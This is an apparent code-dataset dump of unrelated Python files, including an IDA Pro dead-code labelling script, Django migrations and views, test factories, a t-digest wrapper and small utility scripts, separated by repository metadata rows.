# all functions who's only code references are functions that have no cross-references. This
# is to detected functions called only by other functions who have no code references.
# This script helps to detect "dead code" that is never called.
#
# Inputs: start_addr: Start address for segment to define as data
# end_addr: End address for segment to define as data
#
##############################################################################################
################### USER DEFINED VALUES ###################
# None needed.
###########################################################
def addPrefixToFunctionName(prefix, functionAddr):
name = GetFunctionName(curr_addr)
if (name and not name.startswith(prefix)):
name = prefix + name
print ("[label_funcs_with_no_xrefs.py] Function 0x%x Name: " % curr_addr) + name
MakeName(curr_addr, name)
start_addr = AskAddr(MinEA(), "Please enter the starting address for the functions to be examined.")
end_addr = AskAddr(MaxEA(), "Please enter the ending address for the functions to be examined.")
if ((start_addr is not None and end_addr is not None) and (start_addr != BADADDR and end_addr != BADADDR) and start_addr < end_addr):
print "[label_funcs_with_no_xrefs.py] Running on addresses 0x%x to 0x%x" % (start_addr, end_addr)
# If start_addr is in a function, get the starting address of that function. Else, returns -1.
curr_addr = GetFunctionAttr(start_addr, FUNCATTR_START) # Get the function head for the "start" addr
if (curr_addr == BADADDR):
# start_addr is not currently in a function so select the beginning of the next function
curr_addr = NextFunction(start_addr)
# Using this to continually iterate through all functions until no new functions
# having no code reference paths are found.
new_noXrefs_found = False
while (curr_addr != BADADDR and curr_addr < end_addr):
if (not GetFunctionName(curr_addr).startwith("noXrefs_")):
xrefs = XrefsTo(curr_addr)
has_valid_xref = False;
for x in xrefs:
if (not GetFunctionName(x.frm).startswith("noXrefs_")):
# Function has a valid cross-reference and is not "dead code"
has_valid_xref = True;
break;
if (has_valid_xref == False):
# No valid xrefs were found to this function
new_noXrefs_found = True
addPrefixToFunctionName("noXrefs_", curr_addr)
curr_addr = NextFunction(curr_addr)
if ((curr_addr == BADADDR or curr_addr >= end_addr) and new_noXrefs_found):
print "[label_funcs_with_no_xrefs.py] Iterating through range again because new functions with no Xrefs found."
curr_addr = start_addr
new_noXrefs_found = False
print "[label_funcs_with_no_xrefs.py] FINISHED."
else:
print "[label_funcs_with_no_xrefs.py] QUITTING. Invalid address(es) entered."
| 54.987342 | 134 | 0.679558 | 596 | 4,344 | 4.822148 | 0.342282 | 0.044537 | 0.026792 | 0.033403 | 0.127697 | 0.101949 | 0.093946 | 0 | 0 | 0 | 0 | 0.002227 | 0.172882 | 4,344 | 78 | 135 | 55.692308 | 0.797662 | 0.484807 | 0 | 0.060606 | 0 | 0 | 0.276474 | 0.085861 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.151515 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d4d9118ea0e8d98cd4ba6cd174a06a5c614c1a | 833 | py | Python | hknweb/candidate/migrations/0001_initial.py | yuji3w/hknweb | 0df5369da28f46dc9016da97652cb6b8e2b7f3e6 | [
"MIT"
] | 20 | 2018-01-07T02:15:43.000Z | 2021-09-15T04:25:50.000Z | hknweb/candidate/migrations/0001_initial.py | yuji3w/hknweb | 0df5369da28f46dc9016da97652cb6b8e2b7f3e6 | [
"MIT"
] | 292 | 2018-02-01T18:31:18.000Z | 2022-03-30T22:15:08.000Z | hknweb/candidate/migrations/0001_initial.py | yuji3w/hknweb | 0df5369da28f46dc9016da97652cb6b8e2b7f3e6 | [
"MIT"
] | 85 | 2017-11-13T06:33:13.000Z | 2022-03-30T20:32:55.000Z | # Generated by Django 2.1.5 on 2019-02-04 21:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('hknweb', '0006_profile_email'),
]
operations = [
migrations.CreateModel(
name='OffChallenge',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(default='', max_length=255)),
('description', models.TextField(blank=True, default='', max_length=2000)),
('proof', models.TextField(blank=True, default='', max_length=2000)),
('officer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hknweb.Profile')),
],
),
]
| 30.851852 | 113 | 0.595438 | 86 | 833 | 5.686047 | 0.616279 | 0.04908 | 0.09816 | 0.08998 | 0.179959 | 0.179959 | 0.179959 | 0.179959 | 0 | 0 | 0 | 0.04878 | 0.261705 | 833 | 26 | 114 | 32.038462 | 0.746341 | 0.054022 | 0 | 0 | 1 | 0 | 0.100509 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d589beef22b81909a9507279a9f0cdaee7f248 | 716 | py | Python | netbox/virtualization/migrations/0009_custom_tag_models.py | BrnoPCmaniak/netbox | 7b517abdb68a6324950dfd0375861163c7bfff00 | [
"Apache-2.0"
] | 6 | 2017-12-01T05:13:39.000Z | 2020-01-23T13:04:43.000Z | netbox/virtualization/migrations/0009_custom_tag_models.py | emersonfelipesp/netbox | fecca5ad83fb6b48a2f15982dfd3242653f105f9 | [
"Apache-2.0"
] | 25 | 2019-09-17T19:40:50.000Z | 2022-03-11T04:01:55.000Z | netbox/virtualization/migrations/0009_custom_tag_models.py | emersonfelipesp/netbox | fecca5ad83fb6b48a2f15982dfd3242653f105f9 | [
"Apache-2.0"
] | 3 | 2017-11-18T01:28:22.000Z | 2018-05-17T14:04:43.000Z | # Generated by Django 2.1.4 on 2019-02-20 06:56
from django.db import migrations
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
('virtualization', '0008_virtualmachine_local_context_data'),
('extras', '0019_tag_taggeditem'),
]
operations = [
migrations.AlterField(
model_name='cluster',
name='tags',
field=taggit.managers.TaggableManager(through='extras.TaggedItem', to='extras.Tag'),
),
migrations.AlterField(
model_name='virtualmachine',
name='tags',
field=taggit.managers.TaggableManager(through='extras.TaggedItem', to='extras.Tag'),
),
]
| 27.538462 | 96 | 0.624302 | 70 | 716 | 6.271429 | 0.585714 | 0.095672 | 0.113895 | 0.132118 | 0.346241 | 0.346241 | 0.346241 | 0.346241 | 0.346241 | 0.346241 | 0 | 0.042991 | 0.252793 | 716 | 25 | 97 | 28.64 | 0.77757 | 0.062849 | 0 | 0.421053 | 1 | 0 | 0.239163 | 0.056801 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04d98f74dadaaad5c0d7e378e0dab8a3d530d233 | 1,075 | py | Python | core/tests/factories.py | TechFrederick/ship | 5af0af05e3f949a529b9eaa84e7a9a24ec410985 | [
"MIT"
] | 14 | 2020-09-09T01:21:34.000Z | 2022-01-09T05:35:19.000Z | core/tests/factories.py | TechFrederick/ship | 5af0af05e3f949a529b9eaa84e7a9a24ec410985 | [
"MIT"
] | null | null | null | core/tests/factories.py | TechFrederick/ship | 5af0af05e3f949a529b9eaa84e7a9a24ec410985 | [
"MIT"
] | 1 | 2021-09-20T09:04:12.000Z | 2021-09-20T09:04:12.000Z | import factory
class ServiceCategoryFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.ServiceCategory"
name = factory.Sequence(lambda n: f"Service Category {n}")
slug = factory.Sequence(lambda n: f"service-category-{n}")
description = factory.Faker("sentence")
icon = "categories/shelter.png"
class ServiceFactory(factory.django.DjangoModelFactory):
class Meta:
model = "core.Service"
name = factory.Sequence(lambda n: f"Service {n}")
organization_name = factory.Faker("company")
description = factory.Faker("paragraph")
website = factory.Faker("url")
street_address = factory.Faker("street_address")
city = factory.Faker("city")
state = factory.Faker("state_abbr")
zip_code = factory.Faker("postcode")
latitude = factory.Faker("latitude")
longitude = factory.Faker("longitude")
operating_hours = "9am - 5pm Monday-Friday"
phone_number = factory.Faker("phone_number")
email = factory.Faker("email")
category = factory.SubFactory(ServiceCategoryFactory)
| 33.59375 | 64 | 0.703256 | 117 | 1,075 | 6.393162 | 0.435897 | 0.192513 | 0.084225 | 0.088235 | 0.286096 | 0.286096 | 0.286096 | 0.104278 | 0 | 0 | 0 | 0.002245 | 0.171163 | 1,075 | 31 | 65 | 34.677419 | 0.837262 | 0 | 0 | 0.08 | 0 | 0 | 0.209302 | 0.020465 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.92 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
04d9db4a9bc6ee01e77a8adb2a5269415427a678 | 289 | py | Python | pingdom.py | SamJC-FG/microblog-ipset-builder-examples | 6850acbbde8f589bb52cdce56bdad4741d8f8345 | [
"MIT"
] | null | null | null | pingdom.py | SamJC-FG/microblog-ipset-builder-examples | 6850acbbde8f589bb52cdce56bdad4741d8f8345 | [
"MIT"
] | null | null | null | pingdom.py | SamJC-FG/microblog-ipset-builder-examples | 6850acbbde8f589bb52cdce56bdad4741d8f8345 | [
"MIT"
] | null | null | null | import urllib.request
IPSET = []
IPLISTLINK = "https://my.pingdom.com/probes/ipv4"
IPLIST = urllib.request.urlopen(IPLISTLINK)
for ADDRESS in IPLIST:
IPSETENTRY = (ADDRESS.decode().rstrip() + '/32') #Tack on a '/32' to the entry, and append it to the list
IPSET.append(IPSETENTRY) | 36.125 | 109 | 0.712803 | 41 | 289 | 5.02439 | 0.731707 | 0.126214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020243 | 0.145329 | 289 | 8 | 110 | 36.125 | 0.813765 | 0.190311 | 0 | 0 | 0 | 0 | 0.15812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04dac8a52ec4cb9223eff83bae00cb4a1da30c00 | 416 | py | Python | nxos_config_import/migrations/0010_objectconfigurationstatus_post_url.py | j-sulliman/acici | 25f20bf2cdc1ceb1b4752ef0608e9628035912d3 | [
"BSD-3-Clause"
] | 4 | 2019-07-20T11:37:32.000Z | 2020-02-03T07:09:12.000Z | nxos_config_import/migrations/0010_objectconfigurationstatus_post_url.py | j-sulliman/acici | 25f20bf2cdc1ceb1b4752ef0608e9628035912d3 | [
"BSD-3-Clause"
] | 8 | 2019-12-04T23:46:30.000Z | 2021-06-10T18:30:30.000Z | nxos_config_import/migrations/0010_objectconfigurationstatus_post_url.py | j-sulliman/acici | 25f20bf2cdc1ceb1b4752ef0608e9628035912d3 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.1.7 on 2019-03-22 01:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nxos_config_import', '0009_auto_20190322_1408'),
]
operations = [
migrations.AddField(
model_name='objectconfigurationstatus',
name='post_url',
field=models.URLField(default='none'),
),
]
| 21.894737 | 58 | 0.622596 | 44 | 416 | 5.727273 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101639 | 0.266827 | 416 | 18 | 59 | 23.111111 | 0.72459 | 0.108173 | 0 | 0 | 1 | 0 | 0.211382 | 0.130081 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04e8e3089be7716286daa298c66787746a4e98c2 | 1,840 | py | Python | administrator/controller/loginController.py | augustoberwaldt/skin-system | 4ca878d3062abcf3f68c044abaaa631c88f40c5b | [
"MIT"
] | 2 | 2017-08-29T14:17:44.000Z | 2017-08-31T14:40:39.000Z | administrator/controller/loginController.py | augustoberwaldt/diseases-recognition | 4ca878d3062abcf3f68c044abaaa631c88f40c5b | [
"MIT"
] | 2 | 2020-02-11T23:27:55.000Z | 2020-06-05T17:30:29.000Z | administrator/controller/loginController.py | augustoberwaldt/diseases-recognition | 4ca878d3062abcf3f68c044abaaa631c88f40c5b | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from administrator.formsModel import FormUser
from django.contrib import messages
import json
def do_login(request):
if request.method == 'POST' :
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None :
login(request,user)
return redirect('/app/home')
else :
reponse = {'title' : 'Dados invalidos ! ', 'message' : 'Tente novamente.', 'type' : 'error' }
messages.add_message(request, messages.INFO, json.dumps(reponse))
if request.user.is_authenticated():
return redirect('/app/home')
return render(request, 'auth/login.html')
def resetPass(request):
return render(request, 'auth/resetPassword.html')
def register(request):
form = FormUser.FormUser(request.POST or None);
context = {'form': form}
if request.method == 'POST':
if form.is_valid():
form.save()
reponse = {'title': 'Success ', 'message': 'Cadastro realizado !', 'type': 'success'}
messages.add_message(request, messages.INFO, json.dumps(reponse))
return redirect('/app/register')
else :
reponse = {'title': 'Dados invalidos ! ', 'message': 'Tente novamente.', 'type': 'error'}
messages.add_message(request, messages.INFO, json.dumps(reponse))
return render(request, 'auth/register.html', context)
def do_logout(request):
logout(request)
reponse = {'title': 'Success ', 'message': 'Saida com sucesso !', 'type': 'success'}
messages.add_message(request, messages.INFO, json.dumps(reponse))
return redirect('/app/')
| 32.857143 | 105 | 0.640761 | 201 | 1,840 | 5.825871 | 0.298507 | 0.047822 | 0.05807 | 0.085397 | 0.336465 | 0.336465 | 0.336465 | 0.336465 | 0.336465 | 0.336465 | 0 | 0 | 0.222826 | 1,840 | 55 | 106 | 33.454545 | 0.818881 | 0 | 0 | 0.307692 | 0 | 0 | 0.180087 | 0.012514 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102564 | false | 0.102564 | 0.128205 | 0.025641 | 0.410256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
04eca308eb0d6d73b5d0cadfa2fc74793a222035 | 3,081 | py | Python | contentcuration/contentcuration/viewsets/task.py | rgaudin/studio | f6ce46e012c59bfd8cc38c3610db25829a3628f3 | [
"MIT"
] | 1 | 2019-03-30T18:14:25.000Z | 2019-03-30T18:14:25.000Z | contentcuration/contentcuration/viewsets/task.py | rgaudin/studio | f6ce46e012c59bfd8cc38c3610db25829a3628f3 | [
"MIT"
] | 1 | 2020-07-22T02:39:07.000Z | 2020-07-22T12:30:16.000Z | contentcuration/contentcuration/viewsets/task.py | MisRob/studio | 92a5c780c8952f7d37db38952483ab7a28d3cb9d | [
"MIT"
] | null | null | null | from django.conf import settings
from django_filters.rest_framework import DjangoFilterBackend
from django_filters.rest_framework import UUIDFilter
from rest_framework.permissions import IsAuthenticated
from contentcuration.celery import app
from contentcuration.models import Channel
from contentcuration.models import Task
from contentcuration.viewsets.base import DestroyModelMixin
from contentcuration.viewsets.base import ReadOnlyValuesViewset
from contentcuration.viewsets.base import RequiredFilterSet
class TaskFilter(RequiredFilterSet):
channel = UUIDFilter(method="filter_channel")
def filter_channel(self, queryset, name, value):
channel_queryset = Channel.filter_view_queryset(Channel.objects.all(), self.request.user)
if channel_queryset.filter(id=value).exists():
return queryset.filter(channel_id=value)
return queryset.none()
class Meta:
model = Task
fields = ("channel",)
class TaskViewSet(ReadOnlyValuesViewset, DestroyModelMixin):
queryset = Task.objects.all()
permission_classes = [IsAuthenticated]
filter_backends = (DjangoFilterBackend,)
filter_class = TaskFilter
lookup_field = "task_id"
values = (
"task_id",
"task_type",
"created",
"status",
"is_progress_tracking",
"user_id",
"metadata",
)
field_map = {"user": "user_id"}
@classmethod
def id_attr(cls):
return "task_id"
def perform_destroy(self, instance):
# TODO: Add logic to delete the Celery task using app.control.revoke(). This will require some extensive
# testing to ensure terminating in-progress tasks will not put the db in an indeterminate state.
app.control.revoke(instance.task_id, terminate=True)
instance.delete()
def get_edit_queryset(self):
return Task.objects.filter(user=self.request.user)
def consolidate(self, items, queryset):
if not settings.CELERY_TASK_ALWAYS_EAGER:
for item in items:
result = app.AsyncResult(item["task_id"])
if result and result.status:
item["status"] = result.status
if "progress" not in item["metadata"]:
# Just flagging this, but this appears to be the correct way to get task metadata,
# even though the API is marked as private.
meta = result._get_task_meta()
if (
meta
and "result" in meta
and meta["result"]
and not isinstance(meta["result"], Exception)
and "progress" in meta["result"]
):
item["metadata"]["progress"] = meta["result"]["progress"]
else:
item["metadata"]["progress"] = None
item["channel"] = (
item.get("metadata", {}).get("affects", {}).get("channel")
)
return items
| 36.678571 | 112 | 0.618306 | 322 | 3,081 | 5.801242 | 0.375776 | 0.061028 | 0.043362 | 0.049786 | 0.097966 | 0.038544 | 0 | 0 | 0 | 0 | 0 | 0 | 0.293736 | 3,081 | 83 | 113 | 37.120482 | 0.858456 | 0.103862 | 0 | 0 | 0 | 0 | 0.08926 | 0 | 0 | 0 | 0 | 0.012048 | 0 | 1 | 0.075758 | false | 0 | 0.151515 | 0.030303 | 0.469697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04edbc97eb573dfcb7e904909241b79004e0cf18 | 901 | py | Python | setup.py | vicrsp/rto | e9e0b87533ae6bc5e6ad228bb26172384802f9b7 | [
"MIT"
] | null | null | null | setup.py | vicrsp/rto | e9e0b87533ae6bc5e6ad228bb26172384802f9b7 | [
"MIT"
] | 17 | 2020-10-24T18:03:54.000Z | 2020-11-11T22:25:16.000Z | setup.py | vicrsp/rto | e9e0b87533ae6bc5e6ad228bb26172384802f9b7 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='rtotools',
version='0.1.0',
description='Real-Time Optimization Tools',
url='https://github.com/vicrsp/rto',
author='Victor Ruela',
author_email='victorspruela@ufmg.br',
license='MIT',
package_dir={"": "src"},
packages=find_packages(where="src"),
python_requires=">=3.8.5",
install_requires=['pandas',
'numpy',
'matplotlib',
'seaborn',
'sklearn',
'bunch',
'scipy'
],
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
],
) | 31.068966 | 53 | 0.507214 | 78 | 901 | 5.782051 | 0.820513 | 0.053215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013746 | 0.354051 | 901 | 29 | 54 | 31.068966 | 0.761168 | 0 | 0 | 0.071429 | 0 | 0 | 0.379157 | 0.023282 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04eddc8bdb6ec2b2c7b89832a4aae4924f428c67 | 1,519 | py | Python | sdk/keyvault/azure-keyvault-certificates/tests/_test_case.py | GoWang/azure-sdk-for-python | f241e3734a50953c2a37c10d2d84eb4c013b3ba0 | [
"MIT"
] | 1 | 2021-09-07T18:35:49.000Z | 2021-09-07T18:35:49.000Z | sdk/keyvault/azure-keyvault-certificates/tests/_test_case.py | GoWang/azure-sdk-for-python | f241e3734a50953c2a37c10d2d84eb4c013b3ba0 | [
"MIT"
] | 1 | 2021-06-23T14:50:11.000Z | 2021-06-24T12:26:05.000Z | sdk/keyvault/azure-keyvault-certificates/tests/_test_case.py | GoWang/azure-sdk-for-python | f241e3734a50953c2a37c10d2d84eb4c013b3ba0 | [
"MIT"
] | null | null | null | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.keyvault.certificates._shared import HttpChallengeCache
from azure.keyvault.certificates._shared.client_base import DEFAULT_VERSION
from devtools_testutils import AzureTestCase
from parameterized import parameterized
import pytest
def suffixed_test_name(testcase_func, param_num, param):
return "{}_{}".format(testcase_func.__name__, parameterized.to_safe_name(param.kwargs.get("api_version")))
class CertificatesTestCase(AzureTestCase):
def tearDown(self):
HttpChallengeCache.clear()
assert len(HttpChallengeCache._cache) == 0
super(CertificatesTestCase, self).tearDown()
def create_client(self, vault_uri, **kwargs):
if kwargs.pop("is_async", False):
from azure.keyvault.certificates.aio import CertificateClient
credential = self.get_credential(CertificateClient, is_async=True)
else:
from azure.keyvault.certificates import CertificateClient
credential = self.get_credential(CertificateClient)
return self.create_client_from_credential(
CertificateClient, credential=credential, vault_url=vault_uri, **kwargs
)
def _skip_if_not_configured(self, api_version, **kwargs):
if self.is_live and api_version != DEFAULT_VERSION:
pytest.skip("This test only uses the default API version for live tests")
| 42.194444 | 110 | 0.705069 | 162 | 1,519 | 6.376543 | 0.45679 | 0.03485 | 0.065828 | 0.112294 | 0.197483 | 0.129719 | 0.129719 | 0 | 0 | 0 | 0 | 0.000794 | 0.171165 | 1,519 | 35 | 111 | 43.4 | 0.819698 | 0.093483 | 0 | 0 | 0 | 0 | 0.059767 | 0 | 0 | 0 | 0 | 0 | 0.04 | 1 | 0.16 | false | 0 | 0.28 | 0.04 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
04efda0cbdd1c825ae596ff29f999628d80ef0ca | 4,484 | py | Python | tdigest/__init__.py | kpdemetriou/tdigest-cffi | 3bd5e86151a5cc23072d30e42f3392267bfc9067 | [
"BSD-3-Clause"
] | 2 | 2020-01-03T13:41:42.000Z | 2022-02-17T06:26:10.000Z | tdigest/__init__.py | kpdemetriou/tdigest-cffi | 3bd5e86151a5cc23072d30e42f3392267bfc9067 | [
"BSD-3-Clause"
] | 2 | 2020-11-02T03:33:49.000Z | 2020-11-02T04:42:16.000Z | tdigest/__init__.py | kpdemetriou/tdigest-cffi | 3bd5e86151a5cc23072d30e42f3392267bfc9067 | [
"BSD-3-Clause"
] | 1 | 2019-12-14T05:37:29.000Z | 2019-12-14T05:37:29.000Z | from collections import namedtuple
from readerwriterlock.rwlock import RWLockWrite
from ._tdigest import lib as _lib
DEFAULT_COMPRESSION = 400
Centroid = namedtuple("Centroid", ("weight", "mean"))
class RawTDigest:
def __init__(self, compression=DEFAULT_COMPRESSION):
if not isinstance(compression, int):
raise TypeError("'compression' must be of type 'int'")
if compression <= 0:
raise ValueError("'compression' must larger than 0")
self._struct = _lib.tdigest_new(compression)
def __del__(self):
if hasattr(self, "_struct"):
_lib.tdigest_free(self._struct)
def _compress(self):
_lib.tdigest_compress(self._struct)
@property
def compression(self):
return self._struct.compression
@property
def threshold(self):
return self._struct.threshold
@property
def size(self):
return self._struct.size
@property
def weight(self):
if self._struct.point_count:
self._compress()
return self._struct.weight
@property
def centroid_count(self):
if self._struct.point_count:
self._compress()
return self._struct.centroid_count
@property
def compression_count(self):
return self._struct.compression_count
def insert(self, value, weight=1):
if not isinstance(value, (float, int)):
raise TypeError("'value' must be of type 'float' or 'int'")
if not isinstance(weight, int):
raise TypeError("'weight' must be of type 'int'")
if weight <= 0:
raise ValueError("'weight' must larger than 0")
_lib.tdigest_add(self._struct, value, weight)
def quantile(self, value):
if not isinstance(value, float):
raise TypeError("'value' must be of type 'float'")
if value < 0.0 or value > 1.0:
raise ValueError("'value' must be between 0.00 and 1.00")
return _lib.tdigest_quantile(self._struct, value)
def percentile(self, value):
if not isinstance(value, (int, float)):
raise TypeError("'value' must be of type 'float' or 'int'")
if value < 0 or value > 100:
raise ValueError("'value' must be between 0 and 100")
return _lib.tdigest_quantile(self._struct, value / 100)
def cdf(self, value):
if not isinstance(value, (int, float)):
raise TypeError("'value' must be of type 'float' or 'int'")
return _lib.tdigest_cdf(self._struct, value)
def centroids(self):
for i in range(self.centroid_count):
centroid = self._struct.centroids[i]
yield Centroid(centroid.weight, centroid.mean)
def merge(self, other):
if not isinstance(other, (TDigest, RawTDigest)):
raise TypeError("'value' must be of type 'TDigest' or 'RawTDigest'")
_lib.tdigest_merge(self._struct, other._struct)
class TDigest(RawTDigest):
def __init__(self, compression=DEFAULT_COMPRESSION):
super().__init__(compression)
self._lock = RWLockWrite()
@property
def compression(self):
with self._lock.gen_rlock():
return super().compression
@property
def threshold(self):
with self._lock.gen_rlock():
return super().threshold
@property
def size(self):
with self._lock.gen_rlock():
return super().size
@property
def weight(self):
with self._lock.gen_wlock():
return super().weight
@property
def centroid_count(self):
with self._lock.gen_wlock():
return super().centroid_count
@property
def compression_count(self):
with self._lock.gen_rlock():
return super().compression_count
def insert(self, value, weight=1):
with self._lock.gen_wlock():
return super().insert(value, weight)
def quantile(self, value):
with self._lock.gen_wlock():
return super().quantile(value)
def percentile(self, value):
with self._lock.gen_wlock():
return super().percentile(value)
def cdf(self, value):
with self._lock.gen_wlock():
return super().cdf(value)
def centroids(self):
with self._lock.gen_wlock():
return super().centroids()
def merge(self, other):
with self._lock.gen_wlock():
return super().merge(other)
| 27.509202 | 80 | 0.618198 | 529 | 4,484 | 5.060491 | 0.139887 | 0.067239 | 0.053792 | 0.067239 | 0.612253 | 0.522226 | 0.459843 | 0.30183 | 0.209937 | 0.115428 | 0 | 0.009222 | 0.274532 | 4,484 | 162 | 81 | 27.679012 | 0.81371 | 0 | 0 | 0.504274 | 0 | 0 | 0.093443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.239316 | false | 0 | 0.025641 | 0.034188 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04f0f376222a8dd88886d737c5f5530edda3b637 | 185 | py | Python | fishfood/tmp_leds.py | fberlinger/BlueSwarm | cde3de25be68ba728ff31c26a7c7fbe3ff1aa6d8 | [
"MIT"
] | 1 | 2021-10-04T20:44:01.000Z | 2021-10-04T20:44:01.000Z | fishfood/tmp_leds.py | fberlinger/BlueSwarm | cde3de25be68ba728ff31c26a7c7fbe3ff1aa6d8 | [
"MIT"
] | null | null | null | fishfood/tmp_leds.py | fberlinger/BlueSwarm | cde3de25be68ba728ff31c26a7c7fbe3ff1aa6d8 | [
"MIT"
] | null | null | null | import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import time
from lib_utils import *
from lib_leds import LEDS
leds = LEDS()
leds.on()
time.sleep(30)
leds.off() | 14.230769 | 25 | 0.756757 | 32 | 185 | 4.3125 | 0.53125 | 0.173913 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012422 | 0.12973 | 185 | 13 | 26 | 14.230769 | 0.844721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
04f2a0495b108a61505d38568ea3bf1b921fa496 | 999 | py | Python | tetris/utils.py | janmaltel/pytetris | a60475c89ed0fd9666c6e0f1df42c63f62a5b2aa | [
"MIT"
] | 2 | 2019-11-19T12:54:17.000Z | 2020-08-19T13:25:35.000Z | tetris/utils.py | janmaltel/pytetris | a60475c89ed0fd9666c6e0f1df42c63f62a5b2aa | [
"MIT"
